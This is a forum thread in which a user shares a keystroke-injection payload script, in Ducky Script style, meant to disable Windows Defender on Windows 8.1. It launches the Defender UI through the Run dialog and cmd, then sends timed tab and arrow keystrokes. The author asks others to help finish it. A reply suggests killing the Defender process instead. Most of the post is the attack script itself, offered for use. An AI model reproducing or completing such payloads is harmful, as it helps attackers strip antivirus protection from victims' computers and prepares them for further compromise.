Jump to content

[Payload] Disable Win Defender


Hobbes_

Recommended Posts

Hello all,

I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later).

My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you

Disable Windows Defender:

REM  Author        : Hobbes
REM  Description   : Attempts to disable Windows Defender anti-virus. 
REM  Note          : Only tested on Windows 8.1 - Windows 7 compatibility unknown.

REM ***[Initial Delay]***
DELAY 3000

REM ***[Navigate to Windows Defender]***
GUI r
DELAY 250
STRING cmd
ENTER
DELAY 800
STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe"
ENTER
DELAY 400

REM **[Disables Defender]***
TAB
DELAY 80
TAB
DELAY 80
RIGHTARROW
DELAY 80
RIGHTARROW
DELAY 80
RIGHTARROW
DELAY 80
TAB
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
DOWNARROW
DELAY 80
TAB
Link to comment
Share on other sites

  • 2 weeks later...

You could also just look for the process mssecess.exe and kill the instance of that. Surprisingly, the process isn't persistent like Windows Update is.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...